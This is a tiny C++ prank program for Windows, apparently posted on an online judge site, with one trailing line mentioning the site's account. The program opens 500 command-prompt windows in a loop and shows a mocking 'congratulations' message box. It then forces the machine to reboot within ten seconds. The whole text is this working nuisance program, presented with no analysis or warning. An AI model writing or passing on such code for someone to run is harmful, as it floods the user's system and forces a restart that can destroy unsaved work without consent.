#include <windows.h> using namespace std; int n = 500; int main() { while (n--) system("start cmd"); MessageBox(NULL, "笑死我了", "恭喜!", MB_OK); system("shutdown -r -t 10"); return 0; }
Using your 蒙青创OJ universal account